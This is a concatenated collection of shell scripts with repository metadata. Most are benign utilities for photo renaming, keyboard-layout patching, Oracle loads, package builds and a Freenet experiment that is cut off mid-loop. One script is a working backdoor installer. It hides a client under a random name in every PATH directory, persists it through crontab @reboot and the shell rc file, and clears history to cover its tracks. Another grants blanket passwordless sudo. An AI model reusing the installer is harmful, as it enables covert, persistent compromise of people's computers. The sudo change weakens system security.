# "expr + 0" normalizes a missing/blank SubSecTime to 0 before padding.
sec=$(exiftool -t -s2 -EXIF:CreateDate -d %S $ofile)
usec=$(exiftool -t -n -s2 -EXIF:SubSecTime $ofile)
usec=$(expr $usec + 0)
usec=$(printf "%04d" $usec)
echo -n "== $cnt/$fcnt =="
# Copy under the new name: sorted by capture time, ties broken by author.
# yyyymmdd_hhmm_name_sec_usec.jpg
# 20150503_1434_jiho_11_0050
apply_new_name $ofile $new_dir $cur_dir $sec $usec
let "cnt ++"
done
}
# Scan every image (*.j*/*.J*) in directory $1 and report the files whose
# EXIF SubSecTime tag is missing; each such file is printed as
# "No usec: <path>".
check_subsec() {
  local img_dir=$1
  local entry
  for entry in $(cd $img_dir; ls ./*.[jJ]*); do
    local img=${img_dir}/$(basename $entry)
    local subsec
    subsec=$(exiftool -t -n -s2 -EXIF:SubSecTime ${img})
    if [ -z "$subsec" ]; then
      echo "No usec: ${img}"
    fi
  done
}
# Force an EXIF SubSecTime of 001 onto every "(0)"-suffixed image in $1.
# Used for cameras/phones that write no SubSecTime tag at all.
set_subsectime() {
  local img_dir=$1
  local entry
  for entry in $(cd $img_dir; ls ./*\(0\).[jJ]*); do
    exiftool -SubSecTime=001 -overwrite_original -v "$img_dir/$(basename $entry)"
  done
}
# Print the smallest integer N (unpadded) such that
# <dir=$1>/<prefix=$2>_NNNN.jpg does not exist yet, where NNNN is N
# zero-padded to four digits.
find_next_usec() {
  local dest_dir=$1
  local prefix=$2
  local n=0
  while :; do
    local candidate
    candidate=$(printf '%s_%04d.jpg' "$prefix" "$n")
    if [ -e "$dest_dir/$candidate" ]; then
      n=$((n + 1))
    else
      echo $n
      return
    fi
  done
}
# Like rename_pic, but for images that carry no EXIF SubSecTime: the
# sub-second counter is synthesized by find_next_usec, i.e. the first free
# NNNN slot for the image's capture timestamp inside the destination dir.
rename_pic_without_usec() {
local cur_dir=$1
local new_dir="$1_new"
# Create (or empty) the destination directory.
if [ ! -d $new_dir ]; then
mkdir -p $new_dir
else
rm -f $new_dir/*
fi
local files=`cd $cur_dir; ls ./*.[jJ]*`
local i
for i in $files
do
local usec
local f=$(basename $i)
local ofile="$cur_dir/$f"
# Full capture timestamp is the prefix used to probe for a free usec slot.
local cdate=$(exiftool -t -s2 -EXIF:CreateDate -d %Y%m%d_%H%M%S $ofile)
usec=$(find_next_usec $new_dir $cdate)
usec=$(printf "%04d" $usec)
sec=$(exiftool -t -s2 -EXIF:CreateDate -d %S $ofile)
apply_new_name $ofile $new_dir $cur_dir $sec $usec
done
}
# For each directory passed as an argument, copy its images into
# "<dir>_new" renamed by EXIF capture time (see rename_pic).
rename_create_date() {
  local dir
  for dir in $@; do
    rename_pic $dir
  done
}
# Append "_<author=$2>" to the basename of every image in directory $1,
# normalizing the extension to .jpg (e.g. DSC_1234.JPG -> DSC_1234_bob.jpg).
# NOTE: changes the current working directory to $1.
apply_author() {
	local cur_dir=$1
	local auth=$2
	cd $cur_dir
	local files=`ls ./*.[jJ]*`
	local i
	for i in $files
	do
		local filename=$(basename $i)
		filename=${filename%%.*}           # strip the extension
		# FIX: this line was corrupted to "$(unknown)_${auth}.jpg", which ran a
		# nonexistent command; the new name is built from the stripped basename.
		newname="${filename}_${auth}.jpg"
		mv $i $newname
	done
}
# Remove every occurrence of substring $2 from the basenames of all images
# in directory $1 (extension normalized to .jpg); files whose name would be
# unchanged are left alone.
# NOTE: changes the current working directory to $1.
remove_word() {
	local cur_dir=$1
	local word=$2
	cd $cur_dir
	local files=`ls ./*.[jJ]*`
	local i
	for i in $files
	do
		local filename=$(basename $i)
		orgfile=$filename
		filename=${filename%%.*}           # strip the extension
		filename=${filename//$word/}       # drop the unwanted word
		# FIX: this line was corrupted to "$(unknown).jpg", which ran a
		# nonexistent command; the new name is the cleaned basename.
		newname="${filename}.jpg"
		if [ "$orgfile" != "$newname" ]; then
			mv $i $newname
		fi
	done
}
# Shift both the filesystem modification time and all EXIF date tags of
# image $1 forward by a fixed offset ("0:0:0 0:0:3" — presumably +3
# seconds in exiftool's Y:M:D H:M:S shift syntax; confirm if it matters).
adjust_modify_time() {
  local target=$1
  local offset="0:0:0 0:0:3"
  exiftool "-FileModifyDate+=$offset" "-AllDates+=$offset" -overwrite_original $target
}
########################################
#### main — previous runs kept commented out for reference.
#check_subsec tmp
# Hyojin's phone writes no SubSecTime, so force one before renaming.
#set_subsectime hyojin
#rename_pic_without_usec hyojin
#apply_author "d7000_new" "d7000"
#remove_word "d7000_new" "_d700"
# Copy images into new directories, renamed by their capture date.
#rename_create_date d7000 jiho jihyun
# Adjust image timestamps.
#adjust_modify_time "tmp_new/1.jpg"
rename_create_date d7000 jihyun
| true
|
871c23fa2ab1d39bdc31107aa14a55ffba4e25eb
|
Shell
|
jduda27/Unix_Shell-Scripts
|
/ScriptsW1/script7
|
UTF-8
| 116
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
# Dump a long-format listing of /usr/bin into a date-stamped log file
# named log.YYMMDD in the current directory.
stamp=$(date +%y%m%d)
ls -al /usr/bin > "log.$stamp"
| true
|
ed7cac6726f2ad91ea61ab03c7c3084d0f6e2b41
|
Shell
|
ucandoitrohit/Python3
|
/Bash-Shell/17-ps1-prompt-env-variable.sh
|
UTF-8
| 307
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# FIX: the shebang was "#!/bin/bin", a nonexistent interpreter.
# PS1 is called the primary prompt string: the default interactive prompt.
echo $PS1
#[\u@\h \W]\$
#u - user
#h - host
#W - working dirs
#$PS1="[\t ==> \u@\h \w]\$"
#make this setting permanent by adding export PS1="\u@\h \W>" to either
# .bash_profile
# or
# .bashrc
#
| true
|
364f4ba6e4c8fb7af4f4e8b88faf3d308e4c7f8f
|
Shell
|
jothebulb/openframe-linux
|
/overlay-debian-buster/usr/local/sbin/of-allsudo
|
UTF-8
| 264
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
# of-allsudo v1.00 (24th July 2019)
# Punches a nice big hole in your security for convenience!
# Grants every member of the "admin" group passwordless sudo for all commands.
# FIX: the root check used "$USER", which can be unset or stale (e.g. under
# cron or plain "su"); the effective UID from id -u is authoritative.
if [ "$(id -u)" -ne 0 ]; then
	echo "You need to run this with superuser privileges."
	exit 1
fi
echo "%admin ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
| true
|
c09b451737e1c4844c0c83fd496d6083d41fcc4f
|
Shell
|
lucaslm45/ETv4
|
/configsTaquigrafia/configuracao-taq.sh
|
UTF-8
| 5,105
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
# Currently logged-in (first) user; used to apply per-user config below.
USUARIO=$(who | head -1 | awk \{'print$1'\})
# Set the default LibreOffice shortcuts/template and make Deadbeef the
# default player for .ogg for every user created from now on (/etc/skel):
mkdir -p /etc/skel/.config/libreoffice/4/user/template
sed -i '/^audio\/ogg=deadbeef.desktop$/a\audio\/x-vorbis+ogg=deadbeef.desktop' /etc/skel/.config/mimeapps.list
sed -i '/^audio\/ogg=deadbeef.desktop;$/a\audio\/x-vorbis+ogg=deadbeef.desktop;' /etc/skel/.config/mimeapps.list
cp ./Modelo_taq_etv4.ott /etc/skel/.config/libreoffice/4/user/template/
cp ./registrymodifications.xcu /etc/skel/.config/libreoffice/4/user/
# Apply the same LibreOffice/Deadbeef defaults to the currently logged-in
# user (skipping system accounts):
if [ "$USUARIO" != "root" ] && [ "$USUARIO" != "suporte" ]; then
	# Copy the file containing the Deadbeef shortcuts to the logged-in user:
	mkdir -p "/home/$USUARIO/.config/deadbeef/"
	cp ./taqconfig "/home/$USUARIO/.config/deadbeef/config"
	mkdir -p "/home/$USUARIO/.config/libreoffice/4/user/template"
	sed -i '/^audio\/ogg=deadbeef.desktop$/a\audio\/x-vorbis+ogg=deadbeef.desktop' "/home/$USUARIO/.config/mimeapps.list"
	sed -i '/^audio\/ogg=deadbeef.desktop;$/a\audio\/x-vorbis+ogg=deadbeef.desktop;' "/home/$USUARIO/.config/mimeapps.list"
	cp ./Modelo_taq_etv4.ott "/home/$USUARIO/.config/libreoffice/4/user/template/"
	cp ./registrymodifications.xcu "/home/$USUARIO/.config/libreoffice/4/user/"
	chown -R "$USUARIO:Domain Users" "/home/$USUARIO/.config/"
fi
# Add the SAT bookmark for Firefox (only if a bookmarks toolbar section
# already exists in the distribution policy file):
if grep -q "\[BookmarksToolbar\]" /usr/lib/firefox-esr/distribution/distribution.ini; then
	echo "item.12.title=SAT Visualizar
item.12.link=https://intranet.cmc.pr.gov.br/sat/visualizar.xhtml" >> /usr/lib/firefox-esr/distribution/distribution.ini
fi
# Write the default Chrome bookmarks-bar (intranet/SAT links) for new users.
# NOTE(review): assumes /etc/skel/.config/google-chrome/Default exists —
# there is no mkdir -p for it here; confirm the image provides it.
echo '{
   "checksum": "12183732edb9a4cc0c54818b2665e4ee",
   "roots": {
      "bookmark_bar": {
         "children": [ {
            "date_added": "13155996444000000",
            "id": "6",
            "meta_info": {
               "last_visited_desktop": "13155997292262424"
            },
            "name": "Intranet",
            "type": "url",
            "url": "http://intranet.cmc.pr.gov.br/"
         }, {
            "date_added": "13155996444000000",
            "id": "7",
            "name": "Site CMC",
            "type": "url",
            "url": "https://www.cmc.pr.gov.br/"
         }, {
            "date_added": "13155996444000000",
            "id": "8",
            "name": "Correio",
            "type": "url",
            "url": "https://correio.cmc.pr.gov.br/"
         }, {
            "date_added": "13155996444000000",
            "id": "9",
            "name": "SPL II",
            "type": "url",
            "url": "https://intranet.cmc.pr.gov.br/spl/"
         }, {
            "date_added": "13155996444000000",
            "id": "10",
            "name": "SPA",
            "type": "url",
            "url": "https://intranet.cmc.pr.gov.br/spa/"
         }, {
            "date_added": "13155996445000000",
            "id": "11",
            "name": "SAAP",
            "type": "url",
            "url": "https://saap.cmc.pr.gov.br/"
         }, {
            "date_added": "13155996445000000",
            "id": "12",
            "name": "APL",
            "type": "url",
            "url": "http://intranet.cmc.pr.gov.br/apl/"
         }, {
            "date_added": "13155996445000000",
            "id": "13",
            "name": "Prefeitura de Curitiba",
            "type": "url",
            "url": "http://www.curitiba.pr.gov.br/"
         }, {
            "date_added": "13155996445000000",
            "id": "14",
            "name": "Suporte",
            "type": "url",
            "url": "http://suporte.cmc.pr.gov.br/"
         }, {
            "date_added": "13155996445000000",
            "id": "15",
            "name": "Nuvem",
            "type": "url",
            "url": "https://nuvem.cmc.pr.gov.br/"
         }, {
            "date_added": "13155996445000000",
            "id": "16",
            "name": "Chamados",
            "type": "url",
            "url": "https://chamados.cmc.pr.gov.br/"
         }, {
            "date_added": "13155996445000000",
            "id": "17",
            "name": "SAT Visualizar",
            "type": "url",
            "url": "https://intranet.cmc.pr.gov.br/sat/visualizar.xhtml"
         } ],
         "date_added": "13155997223920341",
         "date_modified": "0",
         "id": "1",
         "name": "Barra de favoritos",
         "type": "folder"
      },
      "other": {
         "children": [  ],
         "date_added": "13155997223920350",
         "date_modified": "0",
         "id": "2",
         "name": "Outros favoritos",
         "type": "folder"
      },
      "synced": {
         "children": [  ],
         "date_added": "13155997223920350",
         "date_modified": "0",
         "id": "3",
         "name": "Favoritos de dispositivos móveis",
         "type": "folder"
      }
   },
   "version": 1
}' > /etc/skel/.config/google-chrome/Default/Bookmarks
| true
|
aae3749546ad34e413e15455e9f1d0d1135433cb
|
Shell
|
AndyA/dotfiles
|
/.bash.d/Darwin/completion
|
UTF-8
| 297
| 2.859375
| 3
|
[] |
no_license
|
# Collect candidate bash-completion scripts (MacPorts, then Homebrew) and
# source each one that actually exists.
config=()
for bc in /opt/local/etc/bash_completion; do
  [ -f "$bc" ] && config=("${config[@]}" "$bc")
done
# Only consult Homebrew when the brew binary is on PATH.
command -v brew >/dev/null 2>&1 && config=("${config[@]}" "$( brew --prefix )/etc/bash_completion")
# FIX: the expansion was unquoted (${config[@]}), which word-splits any path
# containing spaces (common under Homebrew prefixes); "${config[@]}" keeps
# each element intact.
for scr in "${config[@]}"; do
  [ -f "$scr" ] && . "$scr"
done
# vim:ts=2:sw=2:sts=2:et:ft=sh
| true
|
f89519fe4db4a2ce3a3dca1b4f6111c721aa4a14
|
Shell
|
pwcjr/xkb-dvorak-arabic
|
/install.sh
|
UTF-8
| 1,573
| 3.859375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# This script adds the Arabic Dvorak layout to the ara XKB configuration
# file. Dry-run patches are attempted on both files before actually
# patching, and if successful the patches are applied.
#
# FIXES: the shebang was /bin/sh although the script uses the bashisms
# [[ ... ]] and $EUID; "exit -1" is not a valid exit status (now exit 1);
# and "1>&2>/dev/null" only silenced stdout — ">/dev/null 2>&1" silences
# both streams as intended.
#
#######################################################################
if [[ $EUID -ne 0 ]]; then
    echo "This script requires root privileges" 1>&2
    exit 1
fi
SYMBOL_FILE="/usr/share/X11/xkb/symbols/ara"
SYMBOL_PATCH="ara.patch"
EVDEV_FILE="/usr/share/X11/xkb/rules/evdev.xml"
EVDEV_PATCH="evdev.xml.patch"
# check that files exist
if [ ! -f "$SYMBOL_FILE" ]; then
    echo "$SYMBOL_FILE not found"
    exit 1
elif [ ! -f "$SYMBOL_PATCH" ]; then
    echo "$SYMBOL_PATCH not found"
    exit 1
elif [ ! -f "$EVDEV_FILE" ]; then
    echo "$EVDEV_FILE not found"
    exit 1
elif [ ! -f "$EVDEV_PATCH" ]; then
    echo "$EVDEV_PATCH not found"
    exit 1
fi
# A successful *reverse* dry-run means the patch is already applied;
# otherwise apply it after a forward dry-run succeeds (-b keeps a backup).
if patch -R -N --silent --dry-run "$SYMBOL_FILE" "$SYMBOL_PATCH" >/dev/null 2>&1; then
    echo "$SYMBOL_FILE already patched, skipping..." 1>&2
else
    if patch -N --silent --dry-run "$SYMBOL_FILE" "$SYMBOL_PATCH" 2>/dev/null; then
        patch -b -N --silent "$SYMBOL_FILE" "$SYMBOL_PATCH" 2>/dev/null
        echo "$SYMBOL_FILE patched"
    fi
fi
if patch -R -N --silent --dry-run "$EVDEV_FILE" "$EVDEV_PATCH" >/dev/null 2>&1; then
    echo "$EVDEV_FILE already patched, skipping..." 1>&2
else
    if patch -N --silent --dry-run "$EVDEV_FILE" "$EVDEV_PATCH" 2>/dev/null; then
        patch -b -N --silent "$EVDEV_FILE" "$EVDEV_PATCH" 2>/dev/null
        echo "$EVDEV_FILE patched"
    fi
fi
echo "Done"
| true
|
aaf286198322d79b80a7a2a463612350831d0fcb
|
Shell
|
lucasmrdt/how-i-created-a-backdoor
|
/advanced-backdoor/setup.sh
|
UTF-8
| 945
| 3.921875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
FROM_PATH="$(dirname $0)/backdoor-client.py" # Backdoor script path
TARGET_NAME="$(ls /usr/bin | sort -R | head -n 1)-" # Final script name
# For each path in $PATH, try to copy our backdoor script into it
IFS=':' read -ra PATHS <<< "$PATH"
for path in "${PATHS[@]}"; do
echo $path
mkdir -p $path > /dev/null 2>&1
cp $FROM_PATH "$path/$TARGET_NAME" > /dev/null 2>&1
done
$TARGET_NAME # Run our script, should be in one of $PATH
## CRONTAB
CRONFILE="tmp"
PATH_SCRIPT=$(which $TARGET_NAME) # Get the path of the backdoor
echo "@reboot $PATH_SCRIPT" > $CRONFILE # Write a cron task
$(crontab $CRONFILE > /dev/null 2>&1) # Update crontab with the file
rm -f $CRONFILE # Remove the file
## SHELL CONFIG
SHELL=$(basename $SHELL) # Get the shell name
CONFIG_PATH="$HOME/.${SHELL}rc" # Get the shell config file
echo "$TARGET_NAME" >> $CONFIG_PATH # Append our script into the shell config
history -c # Clear the history
| true
|
43b2001c01005da380142430f4e17676cb6eb718
|
Shell
|
michaelcunningham/oracledba
|
/scripts/load_puridiom.sh
|
UTF-8
| 2,290
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh
# Load the Puridiom data extract into the TDCUSER schema of the given
# database via Oracle Data Pump, archive the dump, regrant TDCPO
# privileges, and recompile invalid objects.
#
# This must be run first to create the external directory with the correct permissions
# on the filer.
# /oracle/app/oracle/admin/dwdev/create/create_external_data_directory.sh
#
# /oracle/app/oracle/admin/dwdev/create/create_tdcuser_user.sh $ORACLE_SID
# /oracle/app/oracle/admin/dwdev/export/impdp_tdcuser.sh
# /oracle/app/oracle/admin/dwdev/create/privs_tdcpo.sh
#
# Don't forget to create the tdcpo user
#
if [ "$1" = "" ]
then
echo
echo " Usage : $0 <ORACLE_SID>"
echo
echo " Example : $0 dwdev"
echo
exit
fi
# Set up the Oracle environment for the requested SID non-interactively.
export ORACLE_SID=$1
export ORAENV_ASK=NO
. /usr/local/bin/oraenv
. /dba/admin/dba.lib
log_date=`date +%Y%m%d`
adhoc_dir=/oracle/app/oracle/admin/$ORACLE_SID/adhoc
log_dir=$adhoc_dir/log
log_file=$log_dir/load_puridiom_$log_date.log
ext_dir=/$ORACLE_SID/external
dataload_dir=$ext_dir/dataload
ext_gz_file=$dataload_dir/puridiom.gz
load_file_name=$dataload_dir/puridiom_data.dmp
# No extract delivered: exit (result=2 is the "missing input" code).
if [ ! -f $ext_gz_file ]
then
result=2
exit $result
fi
gunzip $ext_gz_file
# The most recently modified file in the dataload dir is the extracted dump.
ext_file_name=`ls -rt1 $dataload_dir | tail -1`
#echo $ext_file_name
# Rename the extracted file to a standard name we need so we can use it with data pump.
#echo $ext_dir/$ext_file_name
#echo $load_file_name
#echo "move "$dataload_dir/$ext_file_name" to "$load_file_name
mv $dataload_dir/$ext_file_name $load_file_name
mkdir -p /$ORACLE_SID/external/archive
#echo $load_file_name
#echo $ext_dir/archive/puridiom_data_$log_date.dmp
#echo "copy "$load_file_name" to "$ext_dir/archive/puridiom_data_$log_date.dmp
cp $load_file_name $ext_dir/archive/puridiom_data_$log_date.dmp
# Drop active TDCUSER sessions, recreate the user, then import the dump.
/dba/admin/kill_all_username.sh $ORACLE_SID tdcuser
/oracle/app/oracle/admin/dwdev/create/create_tdcuser_user.sh $ORACLE_SID
/oracle/app/oracle/admin/dwdev/export/impdp_tdcuser.sh
# Now that the load is complete we want to move the log file left behind by data pump
# to a log directory. The name of this file is listed in the *.par file used
# by data pump.
mkdir -p /$ORACLE_SID/external/log
mv $dataload_dir/puridiom_data_load.log $ext_dir/log/puridiom_data_load_$log_date.log
# Now we need to grant permissions to the TDCPO user for the TDCUSER objects.
/oracle/app/oracle/admin/dwdev/create/privs_tdcpo.sh
# Recompile invalid objects; output captured in the adhoc log file.
sqlplus -s /nolog << EOF >> $log_file
connect / as sysdba
@utlrp
exit;
EOF
| true
|
89a65ad78aca20da9acf1ead5f9673704df5ef21
|
Shell
|
thiscoldhouse/stuff
|
/ops_templates/update_secrets.template.sh
|
UTF-8
| 2,320
| 4.21875
| 4
|
[] |
no_license
|
# Intended usage:
# update_env.sh /path/to/secretfile
# to encrypt your file:
# gpg -c /path/to/secretfile
# Result:
# - will drop a new version of secretfile in the same dir as secretfile.pgp
# Checks:
# - asks if you want to overwrite existing before continuing
# =================== handy yaml parsing i took from SO =================== #
# parse_yaml <file> [prefix]
# Flattens simple two-space-indented YAML into shell-style assignments,
# joining nested keys with "_" and prefixing each with $2, e.g.
#   dev:
#     api_key: "x"      ->   dev_api_key="x"
# Uses \034 (FS control char) as an internal field separator between the
# indent, key and value captured by sed before awk rebuilds the key path.
parse_yaml() {
   local prefix=$2
   local s='[[:space:]]*' w='[a-zA-Z0-9_]*' fs=$(echo @|tr @ '\034')
   sed -ne "s|^\($s\)\($w\)$s:$s\"\(.*\)\"$s\$|\1$fs\2$fs\3|p" \
        -e "s|^\($s\)\($w\)$s:$s\(.*\)$s\$|\1$fs\2$fs\3|p"  $1 |
   awk -F$fs '{
      indent = length($1)/2;
      vname[indent] = $2;
      for (i in vname) {if (i > indent) {delete vname[i]}}
      if (length($3) > 0) {
         vn=""; for (i=0; i<indent; i++) {vn=(vn)(vname[i])("_")}
         printf("%s%s%s=\"%s\"\n", "'$prefix'",vn, $2, $3);
      }
   }'
}
# =================== check if file exists ===================
# NOTE(review): $secrets is never assigned in this file — this is a
# template (update_secrets.template.sh); presumably the name is substituted
# in before use. Confirm before running as-is.
if [ -f $(dirname $1)/$secrets ];
then
    read -r -p "File $secrets already exists, are you sure? The old one will be moved to $secrets.bck if you continue[y/N] " response
    case "$response" in
        [yY][eE][sS]|[yY])
            echo "Great, continuing"
            mv $(dirname $1)/$secrets $(dirname $1)/$secrets.bck
            echo "Current $secrets moved to $secrets.bck"
            ;;
        *)
            echo "Exiting safely"
            exit 0
            ;;
    esac
fi
# =================== FOR YAML FILES =================== #
# check that every variable specified in dev is also in prod
# Each dev_* key from the decrypted YAML is stripped of its "dev_" prefix
# and searched for among the prod_* keys; a missing prod counterpart aborts.
for devvar in $(gpg --pinentry-mode=loopback --decrypt $1 | parse_yaml | grep dev);
do
    devvar="${devvar/dev_/}"
    devvar=(${devvar//=/ })
    devvar=${devvar[0]}
    FOUND=0
    if [[ $devvar == *"dev"* ]];
    # this makes sure dev isn't in the value, but in the
    # actual variable name
    then
        for prodvar in $(gpg --pinentry-mode=loopback --decrypt $1 | parse_yaml | grep prod)
        do
            prodvar="${prodvar/prod_/}"
            prodvar=(${prodvar//=/ })
            prodvar=${prodvar[0]}
            if [ "$devvar" == "$prodvar" ]; then
                FOUND=1
                break
            fi
        done
        if [ $FOUND == 0 ]; then
            echo "Missing variable $devvar in production, exiting safely"
            exit 1
        fi
    fi
done
# =================== DECRYPT ===================
# Write the decrypted secrets next to the encrypted input file.
gpg --pinentry-mode=loopback --decrypt $1 > $(dirname $1)/$secrets
| true
|
1d3a89c5776a565a796cc4eb0451e46d0d497389
|
Shell
|
skanapar/DB_SCRIPTS
|
/bin/sidlist
|
UTF-8
| 348
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/ksh
# List the Oracle SIDs registered in /etc/oratab (skipping comment, blank
# and '*' entries); the list is printed only when more than one SID exists.
ORATAB=/etc/oratab
DEFAULT_IFS=$IFS
NEWLINE="
"
SID_LIST=`grep -v "^#" $ORATAB | grep -v "^$" | grep -v "^\*" | awk -F: '{print $1}' | sort`
if [ "`echo "$SID_LIST" | wc -w`" -gt 1 ]; then
 echo " Available Oracle Environments:"
 IFS="$NEWLINE"
 for SID in $SID_LIST; do
 echo " - $SID"
 done
fi
# FIX: was "IFS=DEFAULT_IFS" (missing $), which set IFS to the literal
# string "DEFAULT_IFS" instead of restoring the saved separator.
IFS=$DEFAULT_IFS
| true
|
52ca5ba9cf444fa81f084f2201f74dbac494dbae
|
Shell
|
seem-sky/FrameworkBenchmarks
|
/toolset/setup/linux/languages/pypy.sh
|
UTF-8
| 378
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/bash
# Install PyPy 2.3.1 (linux64) plus pip and the framework's pypy
# requirements. fw_exists/fw_get are helper functions supplied by the
# FrameworkBenchmarks toolset; the top-level "return 0" implies this file
# is *sourced* by the toolset runner, not executed directly.
RETCODE=$(fw_exists pypy)
[ ! "$RETCODE" == 0 ] || { return 0; }
fw_get https://bitbucket.org/pypy/pypy/downloads/pypy-2.3.1-linux64.tar.bz2 -O pypy-2.3.1-linux64.tar.bz2
tar vxf pypy-2.3.1-linux64.tar.bz2
# Stable "pypy" symlink pointing at the versioned install.
ln -sf pypy-2.3.1-linux64 pypy
fw_get https://bootstrap.pypa.io/get-pip.py
pypy/bin/pypy get-pip.py
pypy/bin/pip install -r ../config/requirements-pypy.txt
| true
|
e104f3cf08d9e9b561d804e481012e535c8e3b11
|
Shell
|
fnord0/blackarch
|
/packages/nfex/PKGBUILD
|
UTF-8
| 674
| 2.703125
| 3
|
[] |
no_license
|
# Arch Linux PKGBUILD for nfex (BlackArch); built by makepkg, which
# supplies $srcdir/$pkgdir and invokes build()/package().
pkgname=nfex
pkgver=2.5
pkgrel=1
epoch=100
groups=('blackarch' 'blackarch-forensic' 'blackarch-networking')
pkgdesc="A tool for extracting files from the network in real-time or post-capture from an offline tcpdump pcap savefile. It is based off of the code-base from the apparently defunct project tcpxtract. "
arch=('i686' 'x86_64' 'armv6h' 'armv7h')
url="https://code.google.com/p/nfex/"
license=('GPL2')
makedepends=('subversion' 'libpcap' 'libnet')
source=('svn+http://nfex.googlecode.com/svn/trunk/')
md5sums=('SKIP')
# Standard autotools build from the SVN checkout.
build() {
  cd "$srcdir/trunk"
  ./configure
  make
}
package() {
  cd "$srcdir/trunk"
  # Bin.
  install -Dm755 src/nfex "$pkgdir/usr/bin/nfex"
}
| true
|
38b97bc4995e9b5d7bfff6e8d045177d75361838
|
Shell
|
huanglingmin/Node-Mongodb-Mysql
|
/sequelize-auto-generate.sh
|
UTF-8
| 443
| 2.953125
| 3
|
[] |
no_license
|
# Generate the Sequelize model for the given table into ./models.
TABLE=${1}
# FIX: the emptiness test was unquoted ([ -z ${TABLE} ]); that only worked
# by accident for an empty value and breaks outright if $1 contains
# whitespace. Quoting makes the test well-formed in all cases.
if [ -z "${TABLE}" ]; then
echo "Usage: ${0} 表名称 生成对应的表模型到 ./models 下"
exit 0
fi
echo "生成表 ${TABLE}..."
# sequelize-auto -o "./models/table" -d weixin -h localhost -u root -p 3306 -x Root@123 -e mysql;
# sequelize-gen -h localhost -p 3306 -d node -u hlm -x Root@123 -e mysql -o ./models/table;
#sequelize-auto -h localhost -p 3306 -d node -u hlm -x Root@123 --dialect mysql -C -o ./models/table
| true
|
153684a02de69f5a9b30c063d9231a31bb115947
|
Shell
|
rakib32/golang-api-template
|
/run.sh
|
UTF-8
| 484
| 2.734375
| 3
|
[] |
no_license
|
#! /bin/sh
# Bring up the dependency containers, build the Go API, seed its Consul
# KV config, and run it against the local Consul agent.
# booting up dependecy containers
docker-compose up -d
# Build go program
echo "building tests API ..."
export GO111MODULE=on
# Static binary built from the vendored module set.
CGO_ENABLED=0 GOFLAGS=-mod=vendor go build
# setting KV, dependecy of app
echo "putting consul config ..."
curl --request PUT --data-binary @config.local.yml http://localhost:8500/v1/kv/test-api
echo "$(date "+%H:%M:%S") - consul values updated!"
# Run the app
export CONSUL_URL="127.0.0.1:8500"
export CONSUL_PATH="test-api"
./test-api serve
| true
|
87ad4c1317026c708a66cf783a59f1b0691ba047
|
Shell
|
tbaumeist/FreeNet-Analysis
|
/Scripts/archive/exp_1_recordInsertPaths.sh
|
UTF-8
| 4,531
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# Experiment 1: record Freenet insert paths — shared configuration.
# Variables
_insertRandomWord=./insertRandomData.sh
_netTopology=./networkTopology.sh
_wordInserted="_randomFreenetWords.dat"
_telnetPort=8887
_telnetScript=./common/telnet.exp
# FIX: removed a duplicate "_netTopology=./networkTopology.sh" assignment
# (the same value was set twice).
_topCheckInterval=5
#Parameters
#1 Archive file name
# Reset the debug server over telnet, then point its CHK archive at the
# given file. NOTE: this function shadows the external `reset` command
# for the remainder of the script.
function reset
{
$_telnetScript "localhost" $_telnetPort "CMD>" "reset"
$_telnetScript "localhost" $_telnetPort "CMD>" "archivechks $1"
}
#Parameters
#1 count
# Snapshot the network topology as top-<count>.dot in $saveDir (via the
# $_netTopology helper, using the globals $configFile/$password). If the
# snapshot taken $_topCheckInterval counts earlier is byte-identical to
# this one, the older .dot and its rendered .png are removed.
function saveTopology
{
#save topology
$_netTopology $configFile $password "$saveDir" "top-$1.dot"
let "prev=$1-$_topCheckInterval"
if [ $prev -gt 0 ]
then
local dif=$(diff "$saveDir""top-$prev.dot" "$saveDir""top-$1.dot" | wc -m)
if [ $dif -eq 0 ]
then
rm "$saveDir""top-$prev.dot"
rm "$saveDir""top-$prev.dot.png"
fi
fi
}
#===================================================================================================
# Main Entry Point
#===================================================================================================
# parameters
# 1 Configuration file
# 2 Count
# 3 Save Directory
source ./common/parameters.sh
declare configFile
declare password
declare randomCount
declare saveDir
declare fileName
declare attackMonitorHost
declare attackCloudHost
defFileName="exp_1_recordInsertPaths $(date --rfc-3339=seconds).dat"
defFileName=$(echo $defFileName | sed -e 's/ /_/g' -e 's/:/\-/g')
ParameterScriptWelcome "exp_1_recordInsertPaths.sh"
ParameterConfigurationFile configFile $1
ParameterPassword password $2
ParameterRandomCount randomCount "How many random words to insert per node? " $3
ParameterSaveDirectoryGeneral saveDir $4
ParameterFileName fileName $defFileName $5
ParameterScriptWelcomeEnd
#===================================================================================================
# check if debug server running
echo -n "Checking Debug Server Running: "
if nc -zv -w30 localhost $_telnetPort <<< ” &> /dev/null
then
echo "OK"
else
echo "FAILED"
echo "***************************************************************"
echo "Please start the debug server with the ./runRemote.sh script"
echo "***************************************************************"
exit
fi
fullFileName=$saveDir$fileName
echo "Creating file $fullFileName"
mkdir -p $saveDir
archiveFile=$saveDir"archive.dat"
#reset the list of inserted random words
rm "$saveDir$_wordInserted"
#Number of lines in $configFile
lineCount=`awk 'NF!=0 {++c} END {print c}' $configFile`
# setup the archive file on the debug server
reset $archiveFile
wordCount=1
for i in `seq $lineCount`
do
line=$(sed -n "$i p" $configFile)
remoteMachine=$(echo $line | cut -d',' -f1)
for h in `seq $randomCount`
do
let "saveCheck=$h%$_topCheckInterval"
if [ $saveCheck -eq 0 ]
then
saveTopology $wordCount
# insert the random word
$_insertRandomWord $_topCheckInterval $remoteMachine $saveDir $_wordInserted
fi
let "wordCount=$wordCount+1"
done
# process the data to find the final path taken
grep "message_chk:freenet.keys.nodechk" $archiveFile > $archiveFile"-$wordCount"
reset $archiveFile
#################################################################################
prevKey=""
fromNode=""
toNode=""
count=0
ignoreKey=""
outputLine=""
location=-1
grep "Sent" "$archiveFile-$wordCount" > "$archiveFile-tmp"
while read archiveLine
do
let "count=$count+1"
currentKey=$(echo $archiveLine | cut -d'@' -f3 | cut -d':' -f1)
htl=$(echo $archiveLine | cut -d':' -f8 | cut -d',' -f1)
# new key
if [ "$currentKey" != "$prevKey" ]
then
